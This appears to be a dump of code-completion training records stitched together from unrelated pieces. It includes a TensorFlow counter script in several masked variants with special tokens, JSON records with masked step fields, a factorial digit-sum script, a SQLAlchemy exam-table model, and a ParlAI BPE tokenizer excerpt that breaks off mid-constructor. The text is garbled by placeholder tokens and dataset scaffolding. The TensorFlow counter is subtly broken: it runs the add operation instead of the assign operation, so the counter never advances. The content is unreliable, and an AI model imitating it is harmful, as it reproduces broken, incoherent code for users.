<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with tf.Session() as sess:
sess.run(init_op)
print(sess.run(state))
for _ in range(10):
sess.run(new_value)
print(sess.run(new_value))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
state = tf.Variable(0, name='counter')
one = tf.constant(1)
new_value = tf.add(state, one)
update = tf.assign(state, new_value)
init_op = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init_op)
print(sess.run(state))
for _ in range(10):
sess.run(new_value)
print(sess.run(new_value))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import tensorflow as tf
state = tf.Variable(0, name='counter')
one = tf.constant(1)
new_value = tf.add(state, one)
update = tf.assign(state, new_value)
init_op = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init_op)
print(sess.run(state))
for _ in range(10):
sess.run(new_value)
print(sess.run(new_value))
<|reserved_special_token_1|>
# coding: utf-8
"""
最简单的计数器,仅仅为了展示基本方式
"""
import tensorflow as tf
# 创建一个变量, 初始化为标量 0
state = tf.Variable(0, name="counter")
# 创建一个operation, 其作用是使state 增加 1
one = tf.constant(1)
new_value = tf.add(state, one)
update = tf.assign(state, new_value) # 这样才能重复执行+1的操作,实际上就代表:state=new_value
# 启动图后, 变量必须先经过`初始化` (init) op 初始化,
# 首先必须增加一个`初始化` op 到图中.
init_op = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init_op) # 运行 init_op
print(sess.run(state)) # 打印出事状态
for _ in range(10):
sess.run(new_value)
print(sess.run(new_value))
|
flexible
|
{
"blob_id": "cf4582f4d0c6c94e617270a45425fe0b770142e0",
"index": 2937,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith tf.Session() as sess:\n sess.run(init_op)\n print(sess.run(state))\n for _ in range(10):\n sess.run(new_value)\n print(sess.run(new_value))\n",
"step-3": "<mask token>\nstate = tf.Variable(0, name='counter')\none = tf.constant(1)\nnew_value = tf.add(state, one)\nupdate = tf.assign(state, new_value)\ninit_op = tf.initialize_all_variables()\nwith tf.Session() as sess:\n sess.run(init_op)\n print(sess.run(state))\n for _ in range(10):\n sess.run(new_value)\n print(sess.run(new_value))\n",
"step-4": "<mask token>\nimport tensorflow as tf\nstate = tf.Variable(0, name='counter')\none = tf.constant(1)\nnew_value = tf.add(state, one)\nupdate = tf.assign(state, new_value)\ninit_op = tf.initialize_all_variables()\nwith tf.Session() as sess:\n sess.run(init_op)\n print(sess.run(state))\n for _ in range(10):\n sess.run(new_value)\n print(sess.run(new_value))\n",
"step-5": "# coding: utf-8\n\"\"\"\n最简单的计数器,仅仅为了展示基本方式\n\"\"\"\nimport tensorflow as tf\n\n# 创建一个变量, 初始化为标量 0\nstate = tf.Variable(0, name=\"counter\")\n\n# 创建一个operation, 其作用是使state 增加 1\none = tf.constant(1)\nnew_value = tf.add(state, one)\nupdate = tf.assign(state, new_value) # 这样才能重复执行+1的操作,实际上就代表:state=new_value\n\n# 启动图后, 变量必须先经过`初始化` (init) op 初始化,\n# 首先必须增加一个`初始化` op 到图中.\ninit_op = tf.initialize_all_variables()\n\nwith tf.Session() as sess:\n sess.run(init_op) # 运行 init_op\n\n print(sess.run(state)) # 打印出事状态\n\n for _ in range(10):\n sess.run(new_value)\n print(sess.run(new_value))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Problem 20: Factorial digit sum
def factorial(num):
sum = 1
while num != 0:
sum *= num
num -= 1
return sum
def sum_digits(num):
sum = 0
while num != 0:
sum += num % 10
num //= 10
return sum
print(sum_digits(factorial(100)))
|
normal
|
{
"blob_id": "cc6f02f9e1633fa15b97af5f926e083a65a8336e",
"index": 5977,
"step-1": "<mask token>\n",
"step-2": "def factorial(num):\n sum = 1\n while num != 0:\n sum *= num\n num -= 1\n return sum\n\n\n<mask token>\n",
"step-3": "def factorial(num):\n sum = 1\n while num != 0:\n sum *= num\n num -= 1\n return sum\n\n\ndef sum_digits(num):\n sum = 0\n while num != 0:\n sum += num % 10\n num //= 10\n return sum\n\n\n<mask token>\n",
"step-4": "def factorial(num):\n sum = 1\n while num != 0:\n sum *= num\n num -= 1\n return sum\n\n\ndef sum_digits(num):\n sum = 0\n while num != 0:\n sum += num % 10\n num //= 10\n return sum\n\n\nprint(sum_digits(factorial(100)))\n",
"step-5": "# Problem 20: Factorial digit sum\n\ndef factorial(num):\n sum = 1\n while num != 0:\n sum *= num\n num -= 1\n return sum\n\ndef sum_digits(num):\n sum = 0\n while num != 0:\n sum += num % 10\n num //= 10\n return sum\n\nprint(sum_digits(factorial(100)))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
print("HELLO3")
|
normal
|
{
"blob_id": "74be250df785590ecf45e048b0d6189e2b445889",
"index": 2181,
"step-1": "<mask token>\n",
"step-2": "print('HELLO3')\n",
"step-3": "print(\"HELLO3\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# coding: utf-8
from sqlalchemy import Column, DateTime, Integer, String
from sqlalchemy.schema import FetchedValue
from application import db
class BmExam(db.Model):
__tablename__ = 'bm_exam'
id = db.Column(db.Integer, primary_key=True)
status = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
exam_id = db.Column(db.Integer, nullable=False)
exam_name = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())
show_exam_name = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())
numbers = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
x_rules = db.Column(db.String(1000), nullable=False, server_default=db.FetchedValue())
m_rules = db.Column(db.String(1000), nullable=False, server_default=db.FetchedValue())
rule_status = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
start_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
end_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
beizhu = db.Column(db.String(2000), nullable=False, server_default=db.FetchedValue())
beizhu2 = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())
beizhu3 = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())
updated_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
created_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
|
normal
|
{
"blob_id": "6be2cc99d03596715d76cda41d63b8c91c829498",
"index": 2211,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass BmExam(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass BmExam(db.Model):\n __tablename__ = 'bm_exam'\n id = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n exam_id = db.Column(db.Integer, nullable=False)\n exam_name = db.Column(db.String(200), nullable=False, server_default=db\n .FetchedValue())\n show_exam_name = db.Column(db.String(200), nullable=False,\n server_default=db.FetchedValue())\n numbers = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n x_rules = db.Column(db.String(1000), nullable=False, server_default=db.\n FetchedValue())\n m_rules = db.Column(db.String(1000), nullable=False, server_default=db.\n FetchedValue())\n rule_status = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n start_time = db.Column(db.DateTime, nullable=False, server_default=db.\n FetchedValue())\n end_time = db.Column(db.DateTime, nullable=False, server_default=db.\n FetchedValue())\n beizhu = db.Column(db.String(2000), nullable=False, server_default=db.\n FetchedValue())\n beizhu2 = db.Column(db.String(200), nullable=False, server_default=db.\n FetchedValue())\n beizhu3 = db.Column(db.String(200), nullable=False, server_default=db.\n FetchedValue())\n updated_time = db.Column(db.DateTime, nullable=False, server_default=db\n .FetchedValue())\n created_time = db.Column(db.DateTime, nullable=False, server_default=db\n .FetchedValue())\n",
"step-4": "from sqlalchemy import Column, DateTime, Integer, String\nfrom sqlalchemy.schema import FetchedValue\nfrom application import db\n\n\nclass BmExam(db.Model):\n __tablename__ = 'bm_exam'\n id = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n exam_id = db.Column(db.Integer, nullable=False)\n exam_name = db.Column(db.String(200), nullable=False, server_default=db\n .FetchedValue())\n show_exam_name = db.Column(db.String(200), nullable=False,\n server_default=db.FetchedValue())\n numbers = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n x_rules = db.Column(db.String(1000), nullable=False, server_default=db.\n FetchedValue())\n m_rules = db.Column(db.String(1000), nullable=False, server_default=db.\n FetchedValue())\n rule_status = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n start_time = db.Column(db.DateTime, nullable=False, server_default=db.\n FetchedValue())\n end_time = db.Column(db.DateTime, nullable=False, server_default=db.\n FetchedValue())\n beizhu = db.Column(db.String(2000), nullable=False, server_default=db.\n FetchedValue())\n beizhu2 = db.Column(db.String(200), nullable=False, server_default=db.\n FetchedValue())\n beizhu3 = db.Column(db.String(200), nullable=False, server_default=db.\n FetchedValue())\n updated_time = db.Column(db.DateTime, nullable=False, server_default=db\n .FetchedValue())\n created_time = db.Column(db.DateTime, nullable=False, server_default=db\n .FetchedValue())\n",
"step-5": "# coding: utf-8\nfrom sqlalchemy import Column, DateTime, Integer, String\nfrom sqlalchemy.schema import FetchedValue\nfrom application import db\n\n\nclass BmExam(db.Model):\n __tablename__ = 'bm_exam'\n\n id = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())\n exam_id = db.Column(db.Integer, nullable=False)\n exam_name = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())\n show_exam_name = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())\n numbers = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())\n x_rules = db.Column(db.String(1000), nullable=False, server_default=db.FetchedValue())\n m_rules = db.Column(db.String(1000), nullable=False, server_default=db.FetchedValue())\n rule_status = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())\n start_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())\n end_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())\n beizhu = db.Column(db.String(2000), nullable=False, server_default=db.FetchedValue())\n beizhu2 = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())\n beizhu3 = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())\n updated_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())\n created_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class ModelIncrStateFlattener(BaseIncrStateFlattener):
<|reserved_special_token_0|>
def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,
torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
new_structured_incr_state = (self.module.
reorder_decoder_incremental_state(incremental_state=
structured_incr_state, inds=inds))
return self._flatten_incr_state(new_structured_incr_state)
def output(self, tensor: torch.Tensor) ->torch.Tensor:
return self.module.output(tensor)
@torch.jit.script
class ScriptableGpt2BpeHelper(object):
"""
Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.
"""
@classmethod
def findall(cls, text: str) ->List[str]:
"""
Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.
"""
contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']
tokens: List[str] = []
idx = 0
num_passes = 0
while idx < len(text):
num_passes += 1
if num_passes > 10000:
return [
'*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'
]
if text[idx] == "'":
captured_suffix = False
for ending in contraction_endings:
if text[idx + 1:idx + 1 + len(ending)] == ending:
tokens.append("'" + ending)
idx += 1 + len(ending)
captured_suffix = True
break
if captured_suffix:
continue
if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(
text) and not text[idx + 1].isspace():
if text[idx] == ' ':
last_matching_idx = idx + 1
else:
last_matching_idx = idx
if text[last_matching_idx].isalpha():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isalpha():
last_matching_idx += 1
elif text[last_matching_idx].isnumeric():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
else:
while last_matching_idx + 1 < len(text) and not text[
last_matching_idx + 1].isspace() and not text[
last_matching_idx + 1].isalpha() and not text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
tokens.append(text[idx:last_matching_idx + 1])
idx = last_matching_idx + 1
continue
if idx + 1 < len(text) and text[idx + 1].isspace():
last_space_idx = idx + 1
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
if last_space_idx + 1 == len(text):
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
else:
tokens.append(text[idx:last_space_idx])
idx = last_space_idx
continue
if True:
last_space_idx = idx
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
return tokens
def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],
byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],
special_tokens: List[str]):
self.add_prefix_space = add_prefix_space
self.encoder = encoder
self.decoder: Dict[str, str] = {}
for k, v in self.encoder.items():
self.decoder[v] = k
self.byte_encoder = byte_encoder
self.byte_decoder: Dict[str, int] = {}
for k, v in self.byte_encoder.items():
self.byte_decoder[v] = k
self.bpe_ranks = fused_key_bpe_ranks
self._special_tokens: Dict[str, int] = {}
for st in special_tokens:
self._special_tokens[st] = 1
def encode(self, text: str) ->List[str]:
"""
Tokenize text.
Checks for add_prefix_space; handles accordingly.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
if self.add_prefix_space:
text = f' {text}'
FINAL = 1
SPLITABLE = 0
pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]
for special_token in self._special_tokens.keys():
i = 0
while i < len(pieces):
subtext, status = pieces[i]
if status == FINAL:
i += 1
continue
split = subtext.split(special_token)
if len(split) > 1:
pieces.pop(i)
for j, piece in enumerate(split):
if j > 0:
pieces.insert(i + j, (special_token, FINAL))
pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))
else:
i += 1
output: List[str] = []
for piece, state in pieces:
if state is FINAL:
output.append(piece)
else:
output += self.helper_encode(piece)
text = ''.join(output)
return output
def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:
"""
Return set of symbol pairs in a word.
Word is represented as list of symbols (symbols being variable-length strings).
:param word:
word to symbolize
:return pairs:
set of tuples of symbols
"""
pairs: List[Tuple[str, str]] = []
prev_char = word[0]
for char in word[1:]:
pairs.append((prev_char, char))
prev_char = char
return pairs
def bpe(self, word: List[str]) ->List[str]:
"""
Convert token to BPE.
:param word:
list of tokens token to convert
:return bpe_encoding:
string bpe encoding
"""
pairs = self.get_pairs(word)
if len(pairs) == 0:
return word
while True:
min_rank = self.bpe_ranks.get('\n'.join(pairs[0]), float('inf'))
bigram = pairs[0]
for pair in pairs[1:]:
current_rank = self.bpe_ranks.get('\n'.join(pair), float('inf')
)
if current_rank < min_rank:
min_rank = current_rank
bigram = pair
if '\n'.join(bigram) not in self.bpe_ranks:
break
first, second = bigram
new_word: List[str] = []
i = 0
while i < len(word):
found = False
for j in range(i, len(word)):
if word[j] == first:
new_word.extend(word[i:j])
i = j
found = True
break
if not found:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word) - 1 and word[i + 1
] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
word = new_word.copy()
if len(word) == 1:
break
else:
pairs = self.get_pairs(word)
return word
def helper_encode(self, text: str) ->List[str]:
"""
Tokenize text.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
bpe_tokens: List[str] = []
for token in self.findall(text):
byte_encoded: List[str] = []
for b in token:
byte_encoded.append(self.byte_encoder[ord(b)])
encoded: List[str] = []
for bpe_token in self.bpe(byte_encoded):
encoded.append(self.encoder[bpe_token])
bpe_tokens.extend(encoded)
return bpe_tokens
def decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into a text string.
:param tokens:
list of tokens
:return text:
decoded text
"""
output: List[str] = []
accum: List[str] = []
for token in tokens:
if token in self._special_tokens:
if len(accum) > 0:
output.append(self.helper_decode(accum))
accum.clear()
output.append(token)
else:
accum.append(token)
if len(accum) > 0:
output.append(self.helper_decode(accum))
text = ''.join(output)
if self.add_prefix_space:
assert text.startswith(' ')
text = text.lstrip(' ')
return text
def helper_decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into text string.
:param tokens:
list of tokens
:return:
decoded text
"""
chars: List[str] = []
for token in tokens:
decoded_token = self.decoder[token]
token_chars = self.utf8_chars(decoded_token)
for char in token_chars:
if not torch.jit.is_scripting():
chars.extend(list(char))
else:
chars.append(char)
decoded_chars: List[str] = []
for char in chars:
decoded_chars.append(chr(self.byte_decoder[char]))
return ''.join(decoded_chars)
def utf8_chars(self, s: str) ->List[str]:
"""
An implementation of UTF8 character iteration in TorchScript. There are no
bitwise operations in torchscript, so we compare directly to integer values.
There isn't a lot of validation, for instance if you pass in an improperly
encoded string with an out-of-place continuation byte, or with a non-left-to-
right byte order, you'll get unexpected results and likely throw. Torch itself
takes in unicode strings and encodes them as UTF8, so that should be actively
hard to do.
The logic is simple: looking at the current start-of-character byte.
If its high bit is 0, it's a 1-byte character. Otherwise, the number of
bytes is the number of leading 1s in its binary representation, so
find that number by comparing it directly to ints with the appropriate
representation, then append that many bytes as a character and move past
them to the next start byte.
From pytext.torchscript.utils.
"""
chars: List[str] = []
i = 0
while i < len(s):
byte = ord(s[i])
if byte < 128:
chars.append(s[i])
i += 1
else:
if byte < 224:
num_bytes = 2
elif byte < 240:
num_bytes = 3
elif byte < 248:
num_bytes = 4
elif byte < 252:
num_bytes = 5
elif byte < 254:
num_bytes = 6
elif byte < 255:
num_bytes = 7
else:
num_bytes = 8
chars.append(s[i:i + num_bytes])
i += num_bytes
return chars
@torch.jit.script
class ScriptableDictionaryAgent:
"""
Builds and/or loads a dictionary.
All code is TorchScriptable.
"""
def __init__(self, null_token: str, end_token: str, unk_token: str,
start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],
ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:
Dict[str, str], bpe_byte_encoder: Dict[int, str],
fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):
self.null_token = null_token
self.end_token = end_token
self.unk_token = unk_token
self.start_token = start_token
self.freq = freq
self.tok2ind = tok2ind
self.ind2tok = ind2tok
self._unk_token_idx = self.tok2ind[self.unk_token]
self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=
bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=
bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,
special_tokens=special_tokens)
def _word_lookup(self, key: str) ->int:
"""
Return index from token, or unk_token's index, or None.
"""
if key in self.tok2ind:
return self.tok2ind[key]
else:
return self._unk_token_idx
def _index_lookup(self, key: int) ->str:
"""
Return token from index, or unk_token.
"""
if key in self.ind2tok:
return self.ind2tok[key]
else:
return self.unk_token
def gpt2_tokenize(self, text: str):
"""
Tokenize using Gpt2 BPE tokenizer.
"""
return self.bpe_tokenize(text)
def tokenize(self, text: str) ->List[str]:
"""
Return a sequence of tokens from the iterable.
Also handles special tokens for some tokenizers
"""
word_tokens = self.gpt2_tokenize(text)
return word_tokens
def bpe_tokenize(self, text: str) ->List[str]:
"""
Return a sequence of BPE-tokens from the text.
"""
return self.bpe.encode(text)
def txt2vec(self, text: str) ->List[int]:
"""
Convert a string to a vector (list of ints).
First runs a sentence tokenizer, then a word tokenizer.
"""
itr: List[int] = []
for token in self.tokenize(str(text)):
itr.append(self._word_lookup(token))
return itr
def vec2txt(self, vector: List[int]) ->str:
"""
Convert a vector of IDs to a string.
Converts a vector (iterable of ints) into a string, with each token separated by
the delimiter (default ``' '``).
"""
tokens = [self._index_lookup(idx) for idx in vector]
text = self.bpe.decode(tokens)
return text
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseIncrStateFlattener(nn.Module):
<|reserved_special_token_0|>
def __init__(self, module: nn.Module):
super().__init__()
self.module = module
<|reserved_special_token_0|>
def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,
Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:
"""
Flatten the input incremental state.
For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored
in flat_incr_state['layer_0__self_attn__prev_key'].
"""
flat_incr_state = {}
for layer_idx, dict1 in structured_incr_state.items():
for attn_type, dict2 in dict1.items():
for state_type, state in dict2.items():
key = f'{layer_idx:d}__{attn_type}__{state_type}'
flat_incr_state[key] = state
return flat_incr_state
class DecoderIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .forward().
"""
def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.
Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.
Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:
if flat_incr_state is not None:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
else:
structured_incr_state = None
tensor, new_structured_incr_state = self.module.forward(input=
input_, encoder_state=encoder_state, incr_state=
structured_incr_state)
new_flat_incr_state = self._flatten_incr_state(
new_structured_incr_state)
return tensor, new_flat_incr_state
class ModelIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .reorder_decoder_incremental_state(). We also support .output(), which is also
traced.
"""
def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,
torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
new_structured_incr_state = (self.module.
reorder_decoder_incremental_state(incremental_state=
structured_incr_state, inds=inds))
return self._flatten_incr_state(new_structured_incr_state)
def output(self, tensor: torch.Tensor) ->torch.Tensor:
return self.module.output(tensor)
@torch.jit.script
class ScriptableGpt2BpeHelper(object):
"""
Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.
"""
@classmethod
def findall(cls, text: str) ->List[str]:
"""
Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.
"""
contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']
tokens: List[str] = []
idx = 0
num_passes = 0
while idx < len(text):
num_passes += 1
if num_passes > 10000:
return [
'*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'
]
if text[idx] == "'":
captured_suffix = False
for ending in contraction_endings:
if text[idx + 1:idx + 1 + len(ending)] == ending:
tokens.append("'" + ending)
idx += 1 + len(ending)
captured_suffix = True
break
if captured_suffix:
continue
if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(
text) and not text[idx + 1].isspace():
if text[idx] == ' ':
last_matching_idx = idx + 1
else:
last_matching_idx = idx
if text[last_matching_idx].isalpha():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isalpha():
last_matching_idx += 1
elif text[last_matching_idx].isnumeric():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
else:
while last_matching_idx + 1 < len(text) and not text[
last_matching_idx + 1].isspace() and not text[
last_matching_idx + 1].isalpha() and not text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
tokens.append(text[idx:last_matching_idx + 1])
idx = last_matching_idx + 1
continue
if idx + 1 < len(text) and text[idx + 1].isspace():
last_space_idx = idx + 1
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
if last_space_idx + 1 == len(text):
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
else:
tokens.append(text[idx:last_space_idx])
idx = last_space_idx
continue
if True:
last_space_idx = idx
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
return tokens
def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],
byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],
special_tokens: List[str]):
self.add_prefix_space = add_prefix_space
self.encoder = encoder
self.decoder: Dict[str, str] = {}
for k, v in self.encoder.items():
self.decoder[v] = k
self.byte_encoder = byte_encoder
self.byte_decoder: Dict[str, int] = {}
for k, v in self.byte_encoder.items():
self.byte_decoder[v] = k
self.bpe_ranks = fused_key_bpe_ranks
self._special_tokens: Dict[str, int] = {}
for st in special_tokens:
self._special_tokens[st] = 1
def encode(self, text: str) ->List[str]:
"""
Tokenize text.
Checks for add_prefix_space; handles accordingly.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
if self.add_prefix_space:
text = f' {text}'
FINAL = 1
SPLITABLE = 0
pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]
for special_token in self._special_tokens.keys():
i = 0
while i < len(pieces):
subtext, status = pieces[i]
if status == FINAL:
i += 1
continue
split = subtext.split(special_token)
if len(split) > 1:
pieces.pop(i)
for j, piece in enumerate(split):
if j > 0:
pieces.insert(i + j, (special_token, FINAL))
pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))
else:
i += 1
output: List[str] = []
for piece, state in pieces:
if state is FINAL:
output.append(piece)
else:
output += self.helper_encode(piece)
text = ''.join(output)
return output
def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:
"""
Return set of symbol pairs in a word.
Word is represented as list of symbols (symbols being variable-length strings).
:param word:
word to symbolize
:return pairs:
set of tuples of symbols
"""
pairs: List[Tuple[str, str]] = []
prev_char = word[0]
for char in word[1:]:
pairs.append((prev_char, char))
prev_char = char
return pairs
def bpe(self, word: List[str]) ->List[str]:
"""
Convert token to BPE.
:param word:
list of tokens token to convert
:return bpe_encoding:
string bpe encoding
"""
pairs = self.get_pairs(word)
if len(pairs) == 0:
return word
while True:
min_rank = self.bpe_ranks.get('\n'.join(pairs[0]), float('inf'))
bigram = pairs[0]
for pair in pairs[1:]:
current_rank = self.bpe_ranks.get('\n'.join(pair), float('inf')
)
if current_rank < min_rank:
min_rank = current_rank
bigram = pair
if '\n'.join(bigram) not in self.bpe_ranks:
break
first, second = bigram
new_word: List[str] = []
i = 0
while i < len(word):
found = False
for j in range(i, len(word)):
if word[j] == first:
new_word.extend(word[i:j])
i = j
found = True
break
if not found:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word) - 1 and word[i + 1
] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
word = new_word.copy()
if len(word) == 1:
break
else:
pairs = self.get_pairs(word)
return word
def helper_encode(self, text: str) ->List[str]:
"""
Tokenize text.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
bpe_tokens: List[str] = []
for token in self.findall(text):
byte_encoded: List[str] = []
for b in token:
byte_encoded.append(self.byte_encoder[ord(b)])
encoded: List[str] = []
for bpe_token in self.bpe(byte_encoded):
encoded.append(self.encoder[bpe_token])
bpe_tokens.extend(encoded)
return bpe_tokens
def decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into a text string.
:param tokens:
list of tokens
:return text:
decoded text
"""
output: List[str] = []
accum: List[str] = []
for token in tokens:
if token in self._special_tokens:
if len(accum) > 0:
output.append(self.helper_decode(accum))
accum.clear()
output.append(token)
else:
accum.append(token)
if len(accum) > 0:
output.append(self.helper_decode(accum))
text = ''.join(output)
if self.add_prefix_space:
assert text.startswith(' ')
text = text.lstrip(' ')
return text
def helper_decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into text string.
:param tokens:
list of tokens
:return:
decoded text
"""
chars: List[str] = []
for token in tokens:
decoded_token = self.decoder[token]
token_chars = self.utf8_chars(decoded_token)
for char in token_chars:
if not torch.jit.is_scripting():
chars.extend(list(char))
else:
chars.append(char)
decoded_chars: List[str] = []
for char in chars:
decoded_chars.append(chr(self.byte_decoder[char]))
return ''.join(decoded_chars)
def utf8_chars(self, s: str) ->List[str]:
"""
An implementation of UTF8 character iteration in TorchScript. There are no
bitwise operations in torchscript, so we compare directly to integer values.
There isn't a lot of validation, for instance if you pass in an improperly
encoded string with an out-of-place continuation byte, or with a non-left-to-
right byte order, you'll get unexpected results and likely throw. Torch itself
takes in unicode strings and encodes them as UTF8, so that should be actively
hard to do.
The logic is simple: looking at the current start-of-character byte.
If its high bit is 0, it's a 1-byte character. Otherwise, the number of
bytes is the number of leading 1s in its binary representation, so
find that number by comparing it directly to ints with the appropriate
representation, then append that many bytes as a character and move past
them to the next start byte.
From pytext.torchscript.utils.
"""
chars: List[str] = []
i = 0
while i < len(s):
byte = ord(s[i])
if byte < 128:
chars.append(s[i])
i += 1
else:
if byte < 224:
num_bytes = 2
elif byte < 240:
num_bytes = 3
elif byte < 248:
num_bytes = 4
elif byte < 252:
num_bytes = 5
elif byte < 254:
num_bytes = 6
elif byte < 255:
num_bytes = 7
else:
num_bytes = 8
chars.append(s[i:i + num_bytes])
i += num_bytes
return chars
@torch.jit.script
class ScriptableDictionaryAgent:
"""
Builds and/or loads a dictionary.
All code is TorchScriptable.
"""
def __init__(self, null_token: str, end_token: str, unk_token: str,
start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],
